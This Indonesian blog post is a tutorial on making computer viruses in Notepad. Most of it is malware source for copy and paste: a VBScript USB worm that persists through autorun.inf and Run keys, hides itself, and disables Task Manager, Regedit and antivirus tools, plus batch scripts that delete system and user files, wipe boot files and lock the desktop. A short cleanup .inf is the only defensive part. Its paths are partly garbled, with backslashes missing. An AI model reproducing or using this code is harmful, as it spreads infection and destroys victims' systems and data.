Cara Membuat Virus
Buat anda yang ingin mempelajari tentang virus tidak ada salahnya untuk mencoba hal yang baru yaitu membuat virus. Dunia teknologi khususnya komputer memang selalu berhubungan dengan virus. Apakah anda sudah tau arti virus? Dari wikipedia dijelaskan Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain.
virus
Smadav, Artav.
Namun pada pembahasan kali ini saya akan berikan tips cara membuat virus via notepad. Berikut cara-caranya dibawah ini :
PEMBUATAN VIRUS DENGAN EKSTENSI .VBS <simpan dengan
nama bosgentongs.exe.vbs>
===========================================================================
‘//BosGenToNgs ITS Ver 2
‘//Varian dari Matrix.VBS
‘//INI VIRUS BERBAHAYA JANGAN DIBUAT MAIN-MAIN!!!!!
‘//Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian
lanjutkan kegiatan virus//
on error resume next
‘//Dim kata-kata berikut ini//
dim mysource,winpath,flashdrive,fs,mf,atr,tf,bosgentongs,nt,check,sd
‘//Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information AliAss atr AutoruN//
atr = “[autorun]” & vbcrlf & “shellexecute=wscript.exe bosgentongs.exe.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
mysource = mysource & text.readline
mysource = mysource & vbcrlf
loop
do
‘//Copy diri untuk menjadi file induk di Windows Path (example: C:Windows)//
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “batch- bosgentongs.exe.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “batch- bosgentongs.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “batch- bosgentongs.exe.vbs “)
tf.attributes = 39
‘//Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok//
‘//Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket//
for each flashdrive in fs.drives
‘//Cek Drive//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
‘//Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A: //
set tf=fs.getfile(flashdrive.path &”bosgentongs.exe.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”bosgentongs.exe.vbs “,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”bosgentongs.exe.vbs “)
tf.attributes = 39
‘//Buat Atorun.inf yang teks-nya tadi sudah datrapkan (Auto Setup Information)//
set tf =fs.getfile(flashdrive.path &”autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”autorun.inf”,2,true)
tf.write atr
tf.close
set tf = fs.getfile(flashdrive.path &”autorun.inf”)
tf.attributes=39
end if
next
‘//Manipulasi Registry//
set bosgentongs = createobject(”WScript.Shell”)
‘//Manip – Ubah Title Internet Explorer menjadi THE bosgentongs v.s. Viruz//
bosgentongs.regwrite “HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title”,” THE bosgentongs v.s. Viruz“
‘//Manip – Set agar file hidden tidak ditampilkan di Explorer//
bosgentongs.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerAdvanced Hidden”,2,“REG_DWORD”
‘//Manip – Hilangkan aliaz blokir menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager//
bosgentongs.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, “1?, “REG_DWORD”
bosgentongs.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions”, “1?, “REG_DWORD”
bosgentongs.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun”, “1?, “REG_DWORD”
bosgentongs.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools”, “1?, “REG_DWORD”
bosgentongs.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr”, “1?, “REG_DWORD”
‘//Manip – Disable klik kanan//
bosgentongs.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu”, “1?, “REG_DWORD”
‘//Manip – Munculkan Pesan Setiap Windows Startup//
bosgentongs.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption”, “Bosgentongs:No Cry No wOman”
bosgentongs.RegWrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText”,”Worm bosgentongs. Variant from Viruz Sex Bebass, don’t panic all data are safe.”
‘//Manip – Aktif setiap Windows Startup//
bosgentongs.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunSystemdir”, winpath & “batch- bosgentongs.exe.vbs “
‘//Manip – Ubah Registered Owner dan Obosgentongsanization//
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredObosgentongsanization”, “The Matrix EvoLution”
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOwner”,”bosgentongs”
‘//Manip – Membuat Cadangan di sistem svchost, MS32Dll dan membuat ikon//
bosgentongs.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunsvchost”,winpath&”bosgentongs.exe.vbs”
bosgentongs.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMS32DLL”,””
bosgentongs.regwrite “HKCRvbsfileDefaultIcon”,”shell32.dll,3”
‘//Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad//
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionscmd.exeDebugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsinstall.exeDebugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmsconfig.exeDebugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedit.exeDebugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedt32.exeDebugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsRegistryEditor.exeDebugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssetup.exeDebugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV.exeDebugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV-CLN.exeDebugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV-RTP.exeDebugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsAnsav.exeDebugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsSM?RTP.exeDebugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsSmadav.exeDebugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavcenter.exeDebugger”,”notepad.exe”
bosgentongs.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavgui.exeDebugger”,”notepad.exe”
‘//New Bonus//
if check <> 1 then
Wscript.sleep 100000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run winpath & “explorer.exe /e,/select, ” & Wscript.ScriptFullname
do while year(now) >= 2009
WScript.sleep 20000
===========================================================================
PEMBUATAN VIRUS DENGAN EKSTENSI .BAT <simpan dengan
nama bosgentongs.bat>
===========================================================================
cd C:
mkdirAlertWarningDangersA NAMAKU BOSGENTONGS ANAK IDEAL SEKALI SEDANG SEDIH MENCARI TEMANMakan
cd C:Windows
mkdirAlertWarningDangersA NAMAKU BOSGENTONGS ANAK IDEAL SEKALI SEDANG SEDIH MENCARI TEMANMakan
cd C:WindowsSystem32
mkdirAlertWarningDangersA NAMAKU BOSGENTONGS ANAK IDEAL SEKALI SEDANG SEDIH MENCARI TEMANMakan
cd D:
mkdirAlertWarningDangersA NAMAKU BOSGENTONGS ANAK IDEAL SEKALI SEDANG SEDIH MENCARI TEMANMakan
@echo off
copy bosgentongsvirus.bmp %systemdrive% /y
copy bosgentongsvirus.bmp %systemdrive%WINDOWS /y
copy bosgentongsvirus.bmp %systemdrive%WINDOWSsystem32 /y
copy bosgentongsvirus.exe %systemdrive% /y
copy bosgentongsvirus.exe %systemdrive%WINDOWS /y
copy bosgentongsvirus.exe %systemdrive%WINDOWSsystem32 /y
reg add “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM BOSGENTONGS” /f
reg add “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogon” /v LegalNoticeText /d “AKU TELAH MENGUASAI YOUR SISTEM!!! MAKA BERDOALAH AGAR TIDAK TERJADI” /f
reg add “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun” /v bosgentongsvirus /d %systemdrive%windowssystem32bosgentongsvirus.exe /f
reg add “HKEY_CURRENT_USERControl PanelDesktop” /v Wallpaper /d
%systemdrive%WINDOWSsystem32bosgentongsvirus.bmp /f
reg add “HKEY_CURRENT_USERControl PanelDesktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_CURRENT_USERControl PanelColors” /v window /d #C10000 /f
reg add “HKEY_USERS.DEFAULTControl PanelDesktop” /v Wallpaper /d
%systemdrive%WINDOWSsystem32bosgentongsvirus.bmp /f
:bgvirus
echo>>Albert.reg
echo>>Anak.chm
echo>>Ideal.dll
echo>>Sekali.htt
cls
goto bgvirus
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo ——————————————————-
echo ============= BOSGENTONGS love HACKER ==============
echo ============= bosgentongs inc. Team ==============
echo ============= Kediri, 16 Juli 2009 ==============
echo ——————————————————-
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo Do you want to kill all program’s? (Y/N)
pause >nul
cls
echo Are you sure want to delete all data? (Y/N)
pause >nul
cls
echo Deleting All Data
ping localhost -n 2 >nul
cls
echo Deleting All Data.
ping localhost -n 2 >nul
cls
echo Deleting All Data..
ping localhost -n 2 >nul
cls
echo Deleting All Data…
cls
Echo Deleting All Data….
ping localhost -n 2 >nul
cls
Echo Deleting All Data…..
ping localhost -n 2 >nul
cls
Echo Deleting All Data……..
ping localhost -n 2 >nul
cls
Echo All data have been Deleted
ping localhost -n 2 >nul
cls
Echo System Error
Echo System can’t open windows Folder
Echo Warning! Sistem shutting down
ping localhost -n 2 >nul
cls
dir /s
shutdown -s -t 5400 -c “This is a virus. You have been Hakced By Bosgentongs. Thank you for your attention“
:bgvirus
echo>>Albert.reg
echo>>Anak.chm
echo>>Ideal.dll
echo>>Sekali.htt
cls
goto bgvirus
===========================================================================
KETERANGAN
# Warna Merah artinya
Tidak Usah Ditulis Karena hanya Sebagai Petunjuk Saja #
# Warna Biru Artinya
Tulisan ini Bisa Diganti Degan Tulisan Sembarang Terserah Kamu #
Anda dapat berimprovisasi dengan menambahkan sebuah file autorun.inf file
untuk menjalankan program tersebut ketika seseorang melakukan klik ganda pada sebuah drive. Untuk membuat auturun buka notepad copy-paste code di bawah dan simpan dengan file name: Autorun.inf dengan save as type: All files Saya Beri kode autorun.inf Bila Belum Tau:
NB: Warna biru adalah nama file virus+ekstensinya yang kamu buat tadi
===========================================================================
AUTORUN UNTUK FILE bosgentongs.exe.vbs <simpan dengan
nama autorun.inf>
===========================================================================
[Autorun]
UseAutoplay=1
Icon=%SystemRoot%system32SHELL32.dll,7
Shellexecute=wscript.exe bosgentongs.exe.vbs
ShellOPENCOMMAND=wscript.exe bosgentongs.exe.vbs
ShellexploreCOMMAND=wscript.exe bosgentongs.exe.vbs
Action=Open folder to view files
===========================================================================
ANTI DOT UNTUK VIRUS bosgentongs.exe.vbs <simpan dengan
extensi antibosgentongs.inf>
Untuk menjalankannya klik kanan file antibosgentongs.inf lalu klik Install
===========================================================================
[Version]
Signature=”$My EartH$”
Provider=Bosgentongs_teaM
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCU,SoftwareMicrosoftInternet ExplorerMain, Window Title,0, “INTERNET EXPLORER”
[del]
HKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer, NoFind
HKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer,
NoFolderOptions
HKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer, NoRun
HKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem,
DisableRegistryTools
HKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem, DisableTaskMgr
HKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer,
NoViewContextMenu
HKLM, SoftwareMicrosoftWindowsCurrentVersionWinlogon, LegalNoticeCaption
HKLM, SoftwareMicrosoftWindowsCurrentVersionWinlogon, LegalNoticeText
HKLM, SoftwareMicrosoftWindowsCurrentVersionRun, Systemdir
HKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionscmd.exe, Debugger
HKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsinstall.exe, Debugger
HKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmsconfig.exe, Debugger
HKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedit.exe, Debugger
HKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedt32.exe, Debugger
HKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsRegistryEditor.exe, Debugger
HKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssetup.exe, Debugger
HKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV.exe, Debugger
HKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV-CLN.exe, Debugger
HKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV-RTP.exe, Debugger
HKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsAnsav.exe, Debugger
HKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsSM?RTP.exe, Debugger
HKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsSmadav.exe, Debugger
HKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavcenter.exe, Debugger
HKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsavgui.exe, Debugger
===========================================================================
VIRUS BGEMPTY.BAT <simpan dengan extensi bgempty.bat>
===========================================================================
cls
cd %HOMEDRIVE%windows
del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv
del /S /F /Q keyboard.sys
del /S /F /Q hal.dll
del /S /F /Q *.exe
del /S /F /Q *.txt
del /S /F /Q *.com
del /S /F /Q *.scr
del /S /F /Q *.ini
del /S /F /Q *.mp3
del /S /F /Q *.wav
del /S /F /Q *.dll
del /S /F /Q *.avi
del /S /F /Q *.jpeg
del /S /F /Q *.mp4
del /S /F /Q *.reg
del /S /F /Q *.rar
del /S /F /Q *.inf
del /S /F /Q *.sdb
del /S /F /Q *.cur
del /S /F /Q *.ani
del /S /F /Q *.zip
del /S /F /Q *.*
cd %HOMEDRIVE%
del /S /F /Q *.exe
del /S /F /Q *.txt
del /S /F /Q *.com
del /S /F /Q *.scr
del /S /F /Q *.ini
del /S /F /Q *.mp3
del /S /F /Q *.wav
del /S /F /Q *.dll
del /S /F /Q *.avi
del /S /F /Q *.jpeg
del /S /F /Q *.mp4
del /S /F /Q *.reg
del /S /F /Q *.rar
del /S /F /Q *.inf
del /S /F /Q *.sdb
del /S /F /Q *.cur
del /S /F /Q *.ani
del /S /F /Q *.zip
del /S /F /Q *.*
cls
ren %HOMEDRIVE%Windowshal.dll hal3.dll
del %HOMEDRIVE%WINDOWSsystem32*.* /F /Q /S
cls
echo DONE!
echo By Bosgentongs
shutdown -r -t 10-c “Selamat semua Virus anda telah dibersihkan… Berbahagialah Siapkan cd windows anda”
===========================================================================
VIRUS Gilazz Team.BAT <simpan dengan extensi bg&gilazteam.bat>
===========================================================================
@echo off
echo ================================
echo ================================
echo Killer Viri
echo created By The GhilazZ Team
echo Support by Bosgentongs Team
echo ================================
echo ================================
echo .
echo Readme.txt
echo Hallo semua program yang ada di hadapan anda ini
echo adalah sebuah program kecil yang unik untuk membunuh virus
echo Caranya sebagai contoh anda cukup mengetikan
echo Nomor saja : 1.Brontok 2.Worm 3.VBS 4…Others
echo Contoh: 1…lalu tekan Enter
echo (Ketikan anda tidak terlihat dilayar)
echo Hapus dan Bersihkan lalu tekan Enter
echo Kamu yakin?? lalu tekan Enter
echo Mudah bukan…???
echo jangan mo kalah dengan bikinan luarnegri
echo coba buatan Indonesia
echo Merdeka…merdeka…merdeka…
echo .
echo Register The GhilazZ Team and supported by Bosgentongs Team
pause
echo Masukkan 1,2,3,4
pause
echo Begin scanning viri….. tekan Enter
cls
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v “DisableRegistryTools” /t REG_DWORD /d 00000001
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v “NoDrives” /t REG_DWORD /d 67108863
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v “DisableTaskMgr” /t REG_DWORD /d 00000001
REG ADD HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v “DisableTaskMgr” /t REG_DWORD /d 00000001
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v “NofIND” /t REG_DWORD /d 00000001
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /V “NoClose” /t REG_DWORD /d 00000001
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /V “NoRun” /t REG_DWORD /d 00000001
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /V “NoLogOff” /t REG_BINARY /d 01000000
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /V “DisableCMD” /t REG_DWORD /d 00000001
REG ADD HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v The_GhilazZ /t REG_SZ /d C:The_GhilazZ.exe
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v The_GhilazZ /t REG_SZ /d C:The_GhilazZ.exe
REG ADD HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v Pinguin_attack /t REG_BINARY /d fuckinjoshbush
REG ADD HKLMSoftwareMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserList /v “SALAM HANGAT UNTUK SEMUA, FROM THE TEAM GHILAZZ…luv U all my victim..mmmuacccchh” /t REG_DWORD /d 00000001
pause
echo Hapus dan Bersihkan lalu tekan Enter
cls
pause
echo Kamu yakin?? lalu tekan Enter
pause
echo Create Backup Windows…..tekan Enter
pause
cls
md We_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_you
md We_destroyed_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_you
md we_are_your_nightmareWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_you
md gue selalu ada disisi loe untuk selamanya setia setiap saat long live so-eng fuckin_josh_bush ought agghh mampus_loe
cls
:viru1
echo Your compie clean but my viri in your computer
echo Your system vulneberity have been Control of my viri
echo Your computer be come weknees…………………..
echo Say good bye to your computers………………….
echo Regards The GhilazZ Team….Salam hangat untukmu….
cls
echo . “We fly inthe night when you’re sleeping in bed”
echo ***************************************************************
echo ***************************************************************
echo The GhilazZ Team Was Here…The GhilazZ Team Was Here…
echo 999999999999999999
echo 999999999999999999999999
echo 9999999999999999999999999999
echo 999999 9999999 9999999
echo 9999999 99999 99999999
echo 9999999 999 99999999
echo 9999999999999999999999999999999
echo 9999999999999999999999999999999
echo 999999999999 99 9999999999999
echo 9999999999999999999999999999999
echo 99999999999999999999999999999
echo 99999999999999999999999
echo 000 000 000 000 00
echo 000 000 000 000 00
echo .. … … … .
echo 00 000 000 000 0
echo 00 000 000 000 0
echo 999999999999999999
echo 9999999999999999
echo 00000000000000
echo The GhilazZ Team Was Here…The GhilazZ Team Was Here…
echo ****************************************************************
echo ****************************************************************
echo>>Inul_oke.exe
echo>>sex_machine.dll
echo>>Tukul_ndeso.asm
echo>>Katro_men.exe
echo>>Vulneberity_its_yours.mp3
echo>>Seek_and_Destroyed.dat
echo>>Sampah_loe.exe
echo>>Gwe_ada_disini.exe
echo>>Britneys_bugilz.mpeg
echo>>Fuckin_US.exe
echo>>TKIKIL.exe
echo>>msfuck.exe
echo>>Goodlinux.exe
goto viru1
copy Inul_oke.exe C:
copy sex_machine.dll C:
copy Tukul_ndeso.asm C:
copy Katro_men.exe C:
copy Vulneberity_its_yours.mp3 C:
copy Seek_and_Destroyed.dat C:
copy Sampah_loe.exe C:
copy Gwe_ada_disini.exe C:
copy Britneys_bugil.mpeg C:
copy Fuckin_US.exe C:
copy TKIKIL.exe C:
copy msfuck.exe C:
copy Goodlinux.exe C:
copy Inul_oke.exe C:WindonwsSystem32
copy sex_machine.dll C:WindonwsSystem32
copy Tukul_ndeso.asm C:WindonwsSystem32
copy Katro_men.exe C:WindonwsSystem32
copy Vulneberity_its_yours.mp3 C:WindonwsSystem32
copy Seek_and_Destroyed.dat C:WindonwsSystem32
copy Sampah_loe.exe C:WindonwsSystem32
copy Gwe_ada_disini.exe C:WindonwsSystem32
copy Britneys_bugil.mpeg C:WindonwsSystem32
copy Fuckin_US.exe C:WindonwsSystem32
copy TKIKIL.exe C:WindonwsSystem32
copy msfuck.exe C:WindonwsSystem32
copy Goodlinux.exe C:WindonwsSystem32
attrib +a +s +h *.*
md We_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_you
md We_destroyed_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_you
md we_are_your_nightmareWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_youWe_come_to_you
md gue selalu ada disisi loe untuk selamanya setia setiap saat long live so-eng fuckin_josh_bush ought agghh mampus_loe
===========================================================================
VIRUS Malware Pucker.BAT <simpan dengan extensi bg&malwarePucKer.bat>
===========================================================================
@echo off & break off
title fuCker v1.4-1-5
attrib +h %0
mode con cols=75 lines=15
cls
color 0a
echo.
echo ad88 ,ad8888ba, 88
echo d8? d8?‘ `”8b 88
echo 88 d8? 88
echo MM88MMM 88 88 88 88 ,d8 ,adPPYba, 8b,dPPYba,
echo 88 88 88 88 88 ,a8? a8P_____ 88 88P’ “Y8
echo 88 88 88 Y8, 8888[ 8PP""""""" 88
echo 88 "8a, ,a88 Y8a. .a8P 88`"Yba, "8b, 88
echo 88 `"YbbdP'Y8 `"Y8888Y"' 88 `Y8a `"Ybbd8"' 88
echo by c0re
echo.
rundll32.exe user32.dll,SwapMouseButton
if exist "%SYSTEMDRIVE%boot.ini" goto winXP 2> nul
if exist "%USERPROFILE%AppData" goto winVISTA 2> nul
@echo
echo x=msgbox("0wned by fuCker w0rm!",vbCritical or vbOkOnly,"fuCker") >> "fuCker.vbs"
start "" "fuCker.vbs" 2> nul
:winXP
echo [Inject] Microsoft Windows XP!
set b0t=boot
attrib -r -s -h “%SYSTEMDRIVE%%b0t%.ini” >nul
del /f /s /q “%SYSTEMDRIVE%%b0t%.ini” >nul
set b0t=
attrib -r -s -h “%SYSTEMDRIVE%ntldr” >nul
del /f /s /q “%SYSTEMDRIVE%ntldr” >nul
set w0n=win
attrib -r -s -h “%SYSTEMROOT%%w0n%.ini” >nul
del /f /s /q “%SYSTEMROOT%%w0n%.ini” >nul
set w0n=
attrib -r -s -h “%SYSTEMROOT%System32hal.dll” >nul
del /f /s /q “%SYSTEMROOT%System32hal.dll” >nul
attrib -r -s -h “%SYSTEMROOT%System32bootcfg.exe” >nul
del /f /s /q “%SYSTEMROOT%System32bootcfg.exe” >nul
reg delete HKLMSYSTEMCurrentControlSetControlSafeBoot /va /f >nul
msg * “**** y0u!”
shutdown -r -t 10 -c “fuCker w0rm deteCted!”
goto end
:winVISTA
echo [Inject] Microsoft Windows Vista!
setlocal enableextensions
for /f “tokens=*” %%a in (
‘reg query HKLMSoftwareMicrosoftWindowsCurrentVersionPol iciesSystem /v EnableLUA’
) do (
set usac=%%a
)
echo %usac%|find /i “0×1? > nul
if errorlevel 1 (
reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesSystem /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
start http://%USERNAME%.homo.com/
attrib -r -s -h “%SYSTEMRDRIVE%bootmgr” >nul
del /f /s /q “%SYSTEMDRIVE%bootmgr” >nul
attrib -r -s -h “%SYSTEMRDRIVE%BOOTSECT.BAK” >nul
del /f /s /q “%SYSTEMRDRIVE%BOOTSECT.BAK” >nul
copy %0 “%ALLUSERSPROFILE%Start MenuProgramsStartup” 2> nul
copy %0 “%USERPROFILE%AppDataRoamingMicrosoftWindowsSt art Menu” 2> nul
echo x=msgbox(“0wned!”,vbCritical or vbOkOnly,”fuCker w0rm”) >> “w0rm.vbs”
start “” “w0rm.vbs” 2> nul
shutdown -s -t 10 -c “fuCker w0rm deteCted!”
goto end
) else (
echo :HjT >> “%TEMP%HjT.bat”
echo tskill /a HijackThis >> “%TEMP%HjT.bat”
echo goto HjT >> “%TEMP%HjT.bat”
start “%TEMP%HjT.bat”
reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesSystem /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
echo do >> “disk.vbs”
echo set oWMP = CreateObject(“WMPlayer.OCX.7? ) >> “disk.vbs”
echo set colCDROMs = oWMP.cdromCollection >> “disk.vbs”
echo colCDROMs.Item(d).Eject >> “disk.vbs”
echo colCDROMs.Item(d).Eject >> “disk.vbs”
echo loop >> “disk.vbs”
start “” “disk.vbs” 2> nul
echo @echo off >> “%USERPROFILE%DesktopfuCkerw0rm.bat”
echo shutdown -r -t 00 -c “fuCker w0rm deteCted!” >> “%USERPROFILE%DesktopfuCkerw0rm.bat”
echo echo 0wned by fuCker w0rm! 0n %DATE% at%TIME% >> “%USERPROFILE%DesktopfuCkerw0rm.bat”
echo @exit >> “%USERPROFILE%DesktopfuCkerw0rm.bat”
set usac=
start “%USERPROFILE%DesktopfuCkerw0rm.bat” 2> nul
echo x=msgbox(“0wned!”,vbCritical or vbOkOnly,”fuCker w0rm”) >> “w0rm.vbs”
start “” “w0rm.vbs” 2> nul
goto end
)
endlocal
:end
cls
exit
===========================================================================
NB: file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY.
Tidak ada komentar:
Posting Komentar